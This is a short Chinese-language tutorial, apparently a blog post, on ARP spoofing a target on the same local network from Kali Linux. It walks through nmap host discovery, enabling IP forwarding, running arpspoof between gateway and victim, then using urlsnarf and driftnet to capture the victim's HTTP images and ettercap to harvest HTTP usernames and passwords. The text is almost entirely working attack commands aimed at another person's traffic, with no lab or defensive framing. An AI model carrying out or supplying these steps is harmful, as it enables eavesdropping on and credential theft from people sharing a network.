同局域网arp欺骗

可以获取对方访问的 http图片,http账号和密码

虚拟机下kali系统

见另一篇文章见虚拟机安装kali系统

发现目标

和目标机在同一局域网下。

查看本机网络配置

  • 方法1
iwconfih
  • 方法2
ifconfig

nmap扫描网段发现目标

nmap 192.168.1.0/24
  • 附录
  1. 批量扫描一个网段的主机存活数
    nmap -sP 192.168.1.0/24
  2. 跳过Ping探测
    nmap -P0 192.168.1.0/24
  3. 扫描IP范围
    nmap -sP 192.168.1.1-50

arpspoof欺骗目标

  1. 开启IP转发 让目标机能上网
    1 写入到 /proc/sys/net/ipv4/ip_forward
echo 1 > /proc/sys/net/ipv4/ip_forward
  1. 查看是否成功
cat /proc/sys/net/ipv4/ip_forward

返回 1 成功

  1. 开始欺骗
    arpspoof -i 网卡 -t 网关ip 目标ip
arpspoof -i wlan0 -t 192.168.1.1 192.168.1.2

现在目标机的数据就会经过,本机。

获取目标机访问的图片

命令行

urlsnarf -i wlan0

driftnet获取目标图片

新建终端窗口 ctrl+shift+T。保持 ARP欺骗

语法: driftnet [options] [filter code]

  • 主要参数:
options filter code
-b 捕获到新的图片时发出嘟嘟声
-i interface 选择监听接口
-f file
-p 不让所监听的接口使用混杂模式
-a 后台模式,将捕获的图片保存到目录中(不会显示在屏幕上)
-m number 指定保存图片数的数目
-d directory 指定保存图片的路径
-x prefix 指定保存图片的前缀名
  • 使用举例:
  1. 实时监听:
driftnet -i wlan0
  1. 保存所有图片到本地
driftnet -i wlan0 -d /home/abc/图片/wifi -a

获取目标账号密码

新建终端窗口 ctrl+shift+T 保持 ARP欺骗
获取目标机在 http 网址输入的账号,密码

ettercap -Tq -i wlan0